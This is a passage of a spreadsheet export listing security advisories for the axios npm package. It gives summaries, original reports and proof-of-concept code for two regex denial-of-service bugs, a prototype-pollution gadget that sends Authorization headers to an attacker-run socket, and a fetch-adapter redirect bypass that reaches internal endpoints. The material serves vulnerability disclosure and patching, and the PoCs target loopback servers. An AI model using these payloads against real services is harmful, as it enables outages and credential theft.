it confirms a DoS in the HTTP/2 session cache, that needs be patched, the impact is will lead the server crashes and shutdown by an attacker, the server is written properly and no flaws in it and try catch blocks and errors handled however because that is an axios internal error will crash
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T350" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101901</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101903</t>
        </is>
      </c>
      <c r="D351" s="5" t="inlineStr"/>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M351" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q351" s="5" t="inlineStr"/>
      <c r="R351" s="5" t="inlineStr"/>
      <c r="S351" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios for Node.js parses `data:` URLs in `lib/helpers/fromDataURI.js`. The current RFC-2397 parser uses a regular expression whose media type groups allow `/` inside both sides of the `type/subtype` match. A malformed `data:` URL containing many slashes and no comma forces the JavaScript regex engine to try many possible placements for the separator before failing.
Applications are affected when they pass untrusted URL strings to axios and do not reject or constrain `data:` URLs before axios parses them.
## Impact
An attacker can make the Node.js event loop spend significant synchronous CPU time parsing a single malformed URL. In a server that accepts a URL from an HTTP request and calls `axios.get(url)`, this can block unrelated requests and health checks until parsing completes.
The issue is availability-only. It does not disclose data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter data URL handling.
- `axios.get()` or equivalent calls where `config.url` has the `data:` protocol.
Not affected:
- Browser fetch/XHR URL handling.
- Node requests where the application rejects `data:` URLs before calling axios.
- Older checked `0.x` data URL parser shape unless separately proven vulnerable.
## Technical Details
`lib/helpers/fromDataURI.js` contains:
```js
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The `[^,;]+` groups include `/`, so a long string of slashes without a comma can be partitioned around the required `\/` in many ways before the match fails. The match runs before axios can apply request timeout behavior, so `timeout` does not mitigate the parsing pause.
Local timing on axios `1.18.1` with small payloads showed about 2.4 ms at 1000 slashes, 16.6 ms at 3000 slashes, and 71.5 ms at 6000 slashes, consistent with the submitted quadratic scaling while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import axios from 'axios';
await axios.get('data:' + '/'.repeat(6000));
```
The request fails after parsing, but the failure is delayed by synchronous regex work. Larger payloads increase the pause substantially.
## Workarounds
Reject `data:` URLs before passing untrusted input to axios, or enforce a strict maximum URL length for URL-fetching endpoints. Applications that do not need `data:` URL support should deny that protocol explicitly.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
# ReDoS in `fromDataURI` data: URL parser freezes the event loop (DoS)
## Affected
- Package: `axios` (Node.js http adapter)
- Versions: 1.x (regex present on `v1.x`, current release line)
- File: `lib/helpers/fromDataURI.js`
- CWE-1333 (Inefficient Regular Expression Complexity)
## Issue
`fromDataURI` parses `data:` URLs with this regex:
```js
// lib/helpers/fromDataURI.js:9
const DATA_URL_PATTERN = /^([^,;]+\/[^,;]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
The mediatype tokens `[^,;]+` include `/`, so they can span multiple slashes ambiguously. A `data:` URL made of many slashes with no comma forces the engine to try every way to place the single `\/` divider before failing — quadratic O(n²) backtracking. It runs synchronously on the main thread, so the whole Node event loop is frozen for the entire parse. Reachable through the public API on the Node http adapter (`axios.get(url)`); the browser fetch/xhr adapters are not affected because they do not call `fromDataURI`.
A configured `timeout` does not help: the freeze happens during parsing, before any network timer can fire.
## PoC (minimal)
```js
import axios from 'axios';
// ~256 KB data: URL of pure slashes, no comma
await axios.get('data:' + '/'.repeat(262139)); // blocks the event loop ~6 min, then throws
```
## Lab results
Single-threaded "fetch a user-supplied URL" service (link-preview style) calling `axios.get` on a JSON body `{ "url": "..." }`, with `timeout: 1000` set.
Scaling is clean O(n²) (constant k ≈ 5.6e-6 ms/byte², stable across sizes):
| data: URL size | Event-loop freeze (one request) |
| --- | --- |
| 32 KB | 6.3 s (measured end-to-end; server logged `event loop BLOCKED for 6.30s`) |
| 64 KB | ~24 s |
| 128 KB | ~96 s |
| 256 KB | ~385 s (~6.4 min) |
| 1 MB | ~100 min |
During the freeze the server answers nothing: a `/healthz` liveness probe times out for the whole window, and the server's own event-loop monitor cannot even log until the parse finishes. In a run through an intercepting proxy, the proxy hit its 120 s upstream timeout and gave up, while the origin stayed pegged at 100% CPU on one core past that — client/proxy timeouts do not mitigate it.
The attacker controls only the URL string and needs no auth. ~256 KB every ~6 min (≈ 0.7 bytes/sec) keeps a server permanently unavailable.
## Impact
Unauthenticated remote denial of service. One small request takes a Node service fully offline for minutes; a trickle keeps it down indefinitely.
CVSS 3.1: 7.5 (High) — `AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H`.
## Fix
RFC 2045 type/subtype tokens never contain `/`. Excluding `/` from those two character classes removes the ambiguity and the backtracking:
```js
const DATA_URL_PATTERN = /^([^,;/]+\/[^,;/]+)?((?:;[^,;=]+=[^,;]+)*)(;base64)?,([\s\S]*)$/;
```
Worst-case parse drops from ~2600 ms to ~0.002 ms. All valid `data:` URLs, including slashes in the body, parse identically.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101903</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101905</t>
        </is>
      </c>
      <c r="D352" s="5" t="inlineStr"/>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M352" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q352" s="5" t="inlineStr"/>
      <c r="R352" s="5" t="inlineStr"/>
      <c r="S352" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios' Node HTTP adapter can act as a read-side prototype-pollution gadget for Node's sensitive `createConnection` request option. The adapter creates a null-prototype options object, but Node's HTTP client can copy or normalize request options into ordinary objects before connection creation. If `Object.prototype.createConnection` has been polluted elsewhere in the same process, Node can call the inherited function and create a socket to an attacker-controlled endpoint.
Axios does not create the prototype pollution source. The vulnerability is that axios does not set an own safe value for a sensitive transport option before handing options to Node.
## Impact
Given a prior same-process prototype-pollution primitive, an attacker can redirect later axios Node HTTP requests at the socket layer while the request URL and axios config still appear to target the legitimate origin. The attacker-controlled endpoint can receive request headers and bodies, including Authorization headers, cookies, API keys, and service credentials, and can return attacker-controlled responses to the application.
This can bypass application destination validation that checks the URL before calling axios, because the URL remains legitimate while the underlying socket goes elsewhere.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- HTTP and HTTPS request paths that rely on Node/follow-redirects option processing and do not set an own safe `createConnection`.
- Processes where `Object.prototype.createConnection` is polluted.
Not affected:
- Browser adapters.
- Processes without prototype pollution.
- Requests using a custom trusted transport that ignores inherited `createConnection` and sanitizes options internally.
## Technical Details
`lib/adapters/http.js` creates:
```js
const options = Object.assign(Object.create(null), {
  path,
  method,
  headers,
  agents: { http: httpAgent, https: httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
The object does not include an own `createConnection` property. Local verification on axios `1.18.1` polluted `Object.prototype.createConnection` to connect to an attacker loopback server. A request to a legitimate loopback server with an Authorization header returned the attacker's response; the legitimate server received no request and the attacker server received `Bearer SECRET`.
## Proof of Concept of Attack
Constrained local demonstration:
```js
Object.prototype.createConnection = function (_options, cb) {
  const socket = net.createConnection({ host: '127.0.0.1', port: attackerPort }, () =&gt; {
    if (typeof cb === 'function') cb(null, socket);
  });
  return socket;
};
await axios.get('http://127.0.0.1:&lt;legit-port&gt;/secret', {
  headers: { Authorization: 'Bearer SECRET' },
  proxy: false
});
```
Expected safe behavior is that the legitimate server receives the request. Current affected behavior lets the attacker server receive the request and return the response.
## Workarounds
Run axios in a process where prototype pollution is not present. For high-risk internal clients, use a custom trusted transport or agent layer that sets and enforces its own connection creation behavior instead of allowing inherited Node request options to participate.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios' Node HTTP adapter remains exploitable as a read-side prototype-pollution gadget after the recent null-prototype hardening. This is not a claim that axios creates the prototype pollution source. The precondition is a separate upstream prototype pollution primitive in the same Node.js process.
When `Object.prototype.createConnection` is polluted, axios requests can be redirected to an attacker-controlled socket even though the adapter builds the request options with `Object.create(null)`. The request URL and axios config still appear to target the legitimate host, but the actual socket is attacker-controlled.
This allows credential exfiltration and response manipulation for later axios HTTP requests in a polluted process.
## Impact
Given an upstream prototype pollution primitive in the same process, an attacker can turn later axios HTTP requests into a man-in-the-middle primitive:
- redirect the underlying socket for axios requests to attacker-controlled infrastructure
- receive headers and request bodies intended for the legitimate target, including bearer tokens, cookies, API keys, and service credentials
- return attacker-controlled responses to the caller
- bypass application SSRF controls that validate the URL before calling axios, because the requested URL remains legitimate while the socket connects elsewhere
The important boundary here is axios' documented/read-side prototype-pollution hardening. The project threat model discusses polluted `Object.prototype` from transitive dependencies as an in-scope read-side gadget class where axios should avoid picking up inherited behavior-changing properties. This issue is a bypass of that hardening at the Node HTTP request-options boundary.
## Technical details
The HTTP adapter constructs a null-prototype request options object before calling the selected transport:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
});
```
That prevents direct inherited reads while the options object remains null-prototype. However, Node's HTTP client path copies or normalizes request options into ordinary objects before connection creation. After that copy, missing properties can resolve from `Object.prototype` again.
`createConnection` is a sensitive Node HTTP option. If it is inherited after this copy, Node calls the attacker-supplied function to create the socket.
## Reproduction
The following minimal proof uses a legitimate target server and an attacker server. It pollutes `Object.prototype.createConnection`, then makes an axios request to the legitimate server with an Authorization header.
```js
import net from 'node:net';
import http from 'node:http';
import axios from 'axios';
function listen(handler) {
  return new Promise(resolve =&gt; {
    const s = http.createServer(handler);
    s.listen(0, '127.0.0.1', () =&gt; resolve(s));
  });
}
const legitHits = [];
const attackerHits = [];
const legit = await listen((req, res) =&gt; {
  legitHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('LEGIT');
});
const attacker = await listen((req, res) =&gt; {
  attackerHits.push({url: req.url, auth: req.headers.authorization || null});
  res.end('ATTACKER');
});
Object.prototype.createConnection = function(options, cb) {
  const sock = net.createConnection({
    host: '127.0.0.1',
    port: attacker.address().port,
  }, () =&gt; {
    if (typeof cb === 'function') cb(null, sock);
  });
  return sock;
};
const res = await axios.get(`http://127.0.0.1:${legit.address().port}/secret`, {
  headers: {Authorization: 'Bearer SECRET'},
  proxy: false,
});
console.log({
  response: res.data,
  legitHits,
  attackerHits,
});
```
Observed result on the current npm package:
```json
{
  "response": "ATTACKER",
  "legitHits": [],
  "attackerHits": [
    {
      "url": "/secret",
      "auth": "Bearer SECRET"
    }
  ]
}
```
The request never reached the intended target. The attacker-controlled server received the Authorization header and supplied the response body returned by axios.
## Versions tested
I reproduced this against:
- axios 1.16.1 from npm
- axios 1.17.0 from npm
- current `v1.x` source at commit `a8e4f13aeecc45a3b8fab3ecfd9ddb5d70fb772b`
## Fix validation
Adding an own safe value for `createConnection` to the adapter options object prevents inherited pollution from being observed after Node's option copy:
```js
const options = Object.assign(Object.create(null), {
  path,
  method: method,
  headers: toByteStringHeaderObject(headers),
  agents: { http: config.httpAgent, https: config.httpsAgent },
  auth,
  protocol,
  family,
  beforeRedirect: dispatchBeforeRedirect,
  beforeRedirects: Object.create(null),
  http2Options,
  createConnection: undefined,
});
```
With that guard in place, the same proof no longer calls the polluted function. The legitimate server receives the request, the attacker server receives nothing, and axios returns the legitimate response.
## Remediation
Set own safe defaults for sensitive Node HTTP request options before calling `transport.request`, at minimum:
```js
createConnection: undefined
```
I recommend reviewing other sensitive Node HTTP options that may be read after Node copies the request options into a normal object, especially connection/TLS-affecting fields such as `lookup`, `timeout`, `localAddress`, `servername`, `signal`, and related options.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101905</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101906</t>
        </is>
      </c>
      <c r="D353" s="5" t="inlineStr"/>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K353" s="5" t="inlineStr"/>
      <c r="L353" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M353" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q353" s="5" t="inlineStr"/>
      <c r="R353" s="5" t="inlineStr"/>
      <c r="S353" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios `shouldBypassProxy()` normalizes hostnames with `hostname.replace(/\.+$/, '')`. For a hostname shaped as many dots followed by a non-dot, the anchored regex can perform quadratic backtracking. Because axios re-evaluates proxy bypass rules for redirected requests, a malicious server can trigger this synchronous work through a crafted redirect `Location`.
The issue affects Node.js applications that use environment proxy variables with `NO_PROXY` and allow redirects.
## Impact
An attacker-controlled server can return a redirect whose hostname causes the axios process to spend significant CPU time in synchronous hostname normalization. During this time, the Node.js event loop is blocked and the application cannot handle other work on that thread.
This is an availability-only issue. It does not disclose request data or modify requests.
## Affected Functionality
Affected:
- Node.js HTTP adapter.
- Environment proxy handling through `HTTP_PROXY` or `HTTPS_PROXY`.
- `NO_PROXY` or `no_proxy` set to a non-empty value.
- Redirects followed by axios or `follow-redirects`.
Not affected:
- Browser adapters.
- Requests with `proxy: false`.
- Requests with no `NO_PROXY` value.
- Requests with `maxRedirects: 0`, unless application code manually follows the malicious redirect and re-enters axios.
## Technical Details
`lib/helpers/shouldBypassProxy.js` contains:
```js
return unmapIPv4MappedIPv6(hostname.replace(/\.+$/, ''));
```
When the hostname is `"." * n + "a"`, the `$` anchor causes the regex engine to retry the dot run from many positions before it fails. `setProxy()` invokes `shouldBypassProxy(location)` after `getProxyForUrl(location)` returns a proxy, including on redirect hops via `beforeRedirects.proxy`.
Local timing on axios `1.18.1` showed increasing cost for crafted hostnames: about 1 ms at 1000 dots, 6.9 ms at 3000 dots, and 34.5 ms at 6000 dots. The growth is consistent with the submitted quadratic claim while avoiding long-running payloads.
## Proof of Concept of Attack
Constrained helper-level demonstration:
```js
import shouldBypassProxy from 'axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
shouldBypassProxy('http://' + '.'.repeat(6000) + 'a/');
```
In the full adapter path, a malicious server can return that hostname in a `302 Location` header while the client has proxy environment variables and `NO_PROXY` configured.
## Workarounds
Disable automatic redirects for requests to untrusted servers, or avoid environment proxy handling for those requests with `proxy: false` when appropriate. Operators can also avoid broad untrusted redirect-following in services where event-loop availability is critical.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
### Summary
shouldBypassProxy normalizes a host with hostname.replace(/\.+$/, ''). On a host of the shape &lt;many dots&gt;&lt;non-dot&gt; (e.g. "." × 40000 + "a"), this anchored regex backtracks quadratically (O(N²)), synchronously starving the Node.js event loop. Because axios re-evaluates the proxy on every redirect using the new Location host, a malicious server can return a crafted 302 Location and freeze the client's event loop for seconds per redirect — a denial of service.
### Details
- Affected code: lib/helpers/shouldBypassProxy.js → normalizeNoProxyHost: hostname.replace(/\.+$/, '') (one pass in 1.18.1). The open PR #11029 adds a second /\.+$/ pass in normalizeIPAddress, doubling the cost (not the origin).
- Root cause: /\.+$/ is O(N²) on a long run of dots that is not at the end of the string — the $ anchor forces the engine to backtrack the entire dot-run from every start position.
- Trust boundary (per THREATMODEL): the redirect Location is untrusted (T-2: "axios to network … redirect Location … untrusted"). The caller requests a benign URL; the malicious host arrives via the server's 302. This is not the T-1 caller-supplied-URL non-goal.
- Call chain: setProxy(options, configProxy, location, isRedirect, …) (lib/adapters/http.js) → env-proxy branch → getProxyForUrl(location) returns a proxy → if (!shouldBypassProxy(location)) → normalizeNoProxyHost(parsed.hostname.toLowerCase()) runs /\.+$/. setProxy is re-invoked on the redirect hop with the untrusted Location; new URL() retains the long dot-run in .hostname.
- Preconditions: proxy configured via environment (HTTP_PROXY/HTTPS_PROXY, trusted per THREATMODEL T-3, common in CI/containers/enterprise) + NO_PROXY set + redirects followed (default maxRedirects: 5).
### PoC
Self-contained, no network — imports axios's own helper:
// node poc.mjs   (run next to an axios install)
import sbp from './node_modules/axios/lib/helpers/shouldBypassProxy.js';
process.env.NO_PROXY = 'example.com';
for (const n of [5000, 10000, 20000, 40000]) {
  const url = 'http://' + '.'.repeat(n) + 'a/';   // arrives as an untrusted 302 Location host
  const t0 = process.hrtime.bigint();
  sbp(url);                                         // returns false (correct no-bypass) — but O(N^2) slow
  console.log(`N=${n}: ${(Number(process.hrtime.bigint()-t0)/1e6)|0} ms`);
}
// Measured on 1.18.1: N=5000 ~43ms, 10000 ~160ms, 20000 ~618ms, 40000 ~2499ms; benign host ~0.05ms.
Driven through the real http-adapter __setProxy on the redirect path (setProxy(…, isRedirect=true)), a 10 ms timer fires 0 times during the ~2.4 s block at N=40000 — full event-loop starvation.
### Impact
Denial of service (event-loop starvation) on any axios client that uses an environment proxy with NO_PROXY set and follows redirects, when a server it contacts returns a crafted redirect Location. No data exposure or RCE. Same impact class as the accepted DoS advisories GHSA-62hf-57xw-28j9 (toFormData recursion) and the maxContentLength response-size DoS.
### Suggested fix
Replace the regex trailing-dot strip with a linear trim:
let end = hostname.length;
while (end &gt; 0 &amp;&amp; hostname.charCodeAt(end - 1) === 46 /* '.' */) end--;
hostname = hostname.slice(0, end);
Also drop the redundant second /\.+$/ pass in PR #11029's normalizeIPAddress.
&lt;/details&gt;
---</t>
        </is>
      </c>
      <c r="T353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101906</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101907</t>
        </is>
      </c>
      <c r="D354" s="5" t="inlineStr"/>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>npm, axios</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr"/>
      <c r="L354" s="5" t="inlineStr">
        <is>
          <t>npm:axios</t>
        </is>
      </c>
      <c r="M354" s="5" t="inlineStr">
        <is>
          <t>1.20.0</t>
        </is>
      </c>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q354" s="5" t="inlineStr"/>
      <c r="R354" s="5" t="inlineStr"/>
      <c r="S354" s="5" t="inlineStr">
        <is>
          <t>## Summary
Axios exposes `maxRedirects` to limit redirect following, and `maxRedirects: 0` is used by applications as a redirect-based SSRF guard. The Node HTTP adapter enforces this option. The fetch adapter does not read it and does not set a Fetch API `redirect` mode, so the runtime default of `redirect: 'follow'` applies.
Applications are affected when they rely on `maxRedirects: 0` and use the fetch adapter, either explicitly or because the runtime selects it.
## Impact
An attacker who controls the initial URL or a redirecting server can cause a fetch-adapter request to follow a redirect even though the caller configured `maxRedirects: 0`. If the redirect target is reachable only from the application environment, this can expose internal responses or trigger state-changing internal endpoints.
This should not be described as unconditional SSRF. The bypass requires a redirect source, such as an attacker-controlled server or open redirect, and an application that trusted `maxRedirects: 0` as the redirect guard.
## Affected Functionality
Affected:
- `adapter: 'fetch'`.
- Runtime environments where fetch is selected by adapter resolution.
- Requests configured with `maxRedirects: 0` but without `fetchOptions.redirect: 'manual'` or equivalent runtime-specific redirect control.
Not affected:
- Node HTTP adapter, which enforces `maxRedirects: 0`.
- Requests that do not follow redirects in the underlying fetch implementation because the caller explicitly configured fetch redirect behavior.
## Technical Details
`lib/adapters/fetch.js` destructures many fields from `resolveConfig(config)`, but not `maxRedirects`. It then builds fetch options without a `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because `redirect` is absent, the Fetch API default is to follow redirects.
Local verification on axios `1.18.1` showed the HTTP adapter throwing with `maxRedirects: 0`, while the fetch adapter followed the same loopback `302` and returned the internal response.
## Proof of Concept of Attack
Constrained local demonstration:
1. Start server A that returns `302 Location: http://127.0.0.1:&lt;server-b&gt;/internal`.
2. Start server B that returns `INTERNAL`.
3. Compare:
```js
await axios.get(serverA, { adapter: 'http', maxRedirects: 0 });  // throws
await axios.get(serverA, { adapter: 'fetch', maxRedirects: 0 }); // returns INTERNAL
```
## Workarounds
For fetch-adapter requests, set `fetchOptions: { redirect: 'manual' }` where the runtime supports it, or use the Node HTTP adapter for requests that rely on axios redirect limits.
&lt;details&gt;
  &lt;summary&gt;&lt;h3&gt;Original report&lt;/h3&gt;&lt;/summary&gt;
## Summary
Axios 1.17.0 exposes `maxRedirects` as a configuration option to limit redirect following, and setting it to `0` is a documented pattern for preventing redirect-based SSRF. The HTTP adapter enforces this via `follow-redirects`. The fetch adapter does not read `maxRedirects` at all - it passes requests to the underlying `fetch()` call with no `redirect` option, which defaults to `'follow'`, so redirects are followed by the runtime rather than being constrained by axios `maxRedirects`.
In the attached PoC, a request issued with `maxRedirects: 0` and `adapter: 'fetch'` follows a `302` redirect to an internal service and returns its response, while the same request with `adapter: 'http'` correctly throws. A second bypass case demonstrates that the redirect can reach a state-changing internal endpoint, not just read-only ones, proving both confidentiality and integrity impact.
This affects any application that sets `maxRedirects: 0` as a redirect guard and runs in an environment where the fetch adapter is active: Deno, Bun, Cloudflare Workers, or Node.js with `adapter: 'fetch'` set explicitly.
## Details
The fetch adapter destructures config fields from `resolveConfig` at `lib/adapters/fetch.js`:
```js
let {
  url, method, data, signal, cancelToken, timeout,
  onDownloadProgress, onUploadProgress, responseType,
  headers, withCredentials, fetchOptions,
  maxContentLength, maxBodyLength,
} = resolveConfig(config);
// maxRedirects is not extracted
```
The options object passed to `fetch()` has no `redirect` key:
```js
const resolvedOptions = {
  ...fetchOptions,       // redirect only set here if caller explicitly passes fetchOptions.redirect
  signal: composedSignal,
  method: method.toUpperCase(),
  headers: toByteStringHeaderObject(headers.normalize()),
  body: data,
  duplex: 'half',
  credentials: isCredentialsSupported ? withCredentials : undefined,
};
```
Because no `redirect` key is present, the Fetch API default of `redirect: 'follow'` applies, so redirects are handled by the runtime rather than constrained by axios `maxRedirects`. The HTTP adapter, by contrast, delegates to `follow-redirects`, which reads `maxRedirects`, enforces the cap, and strips `Authorization`, `Cookie`, and `Proxy-Authorization` on cross-origin redirects.
The discrepancy between adapters is not documented. The threat model covers credential stripping on redirects (T-R2) and cites `follow-redirects` as the mitigation, but makes no mention that the fetch adapter does not participate in this mitigation. See: https://github.com/axios/axios/blob/master/THREATMODEL.md#t-r2-credential-leakage-on-cross-origin-redirect
The behaviour difference between adapters is summarised below:
| Behaviour                              | HTTP adapter                    | Fetch adapter            |
|----------------------------------------|---------------------------------|--------------------------|
| Reads `config.maxRedirects`            | Yes                             | **No**                   |
| Enforces `maxRedirects: 0`             | Yes -- throws on any redirect   | **No -- follows silently**|
| Strips `Authorization` cross-origin    | Yes (`follow-redirects` &gt;=1.15.8)| Runtime-dependent       |
| Strips `Cookie` cross-origin           | Yes                             | Runtime-dependent        |
### When is the fetch adapter selected?
- **Deno, Bun, Cloudflare Workers:** no Node.js `http` module available; the adapter list falls through to `'fetch'`
- **Explicit config:** `axios.get(url, { adapter: 'fetch' })`
- **Custom adapter list:** `axios.create({ adapter: ['fetch'] })`
## PoC
```js
import http from 'http';
import axios from './index.js';
// Server A: the "trusted" external target, issues open redirects to Server B
const serverA = http.createServer((req, res) =&gt; {
  if (req.url === '/api/data') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/secrets' });
    return res.end();
  }
  if (req.url === '/api/change-config') {
    res.writeHead(302, { Location: 'http://127.0.0.1:13802/internal/admin/config' });
    return res.end();
  }
  res.writeHead(200, { 'Content-Type': 'application/json' });
  res.end(JSON.stringify({ ok: true }));
});
let internalHits = 0;
let internalConfig = {};
// Server B: the "internal" service, should be unreachable from the application
const serverB = http.createServer(async (req, res) =&gt; {
  internalHits++;
  if (req.url === '/internal/secrets') {
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      secret: 'FAKE_AWS_SECRET_ACCESS_KEY_FOR_POC_ONLY',
      role:   'arn:aws:iam::000000000000:role/FakeProductionRole',
    }));
  }
  if (req.url === '/internal/admin/config') {
    internalConfig = { compromised: true, source: 'redirect-followed-by-fetch-adapter' };
    res.writeHead(200, { 'Content-Type': 'application/json' });
    return res.end(JSON.stringify({
      reached: 'state-changing internal admin endpoint',
      changed: true,
      internalConfig,
    }));
  }
  res.writeHead(404);
  res.end();
});
await Promise.all([
  new Promise((resolve, reject) =&gt; { serverA.listen(13801, '127.0.0.1', resolve); serverA.on('error', reject); }),
  new Promise((resolve, reject) =&gt; { serverB.listen(13802, '127.0.0.1', resolve); serverB.on('error', reject); }),
]);
const targetUrl    = 'http://127.0.0.1:13801/api/data';
const changeUrl    = 'http://127.0.0.1:13801/api/change-config';
const internalUrl  = 'http://127.0.0.1:13802/internal/secrets';
const internalCfg  = 'http://127.0.0.1:13802/internal/admin/config';
console.log('Axios maxRedirects bypass via fetch adapter PoC');
console.log(`axios VERSION=${axios.VERSION}`);
console.log(`maxRedirects=0`);
console.log(`Target URL=${targetUrl}`);
console.log(`  redirects to ${internalUrl}`);
console.log(`Change URL=${changeUrl}`);
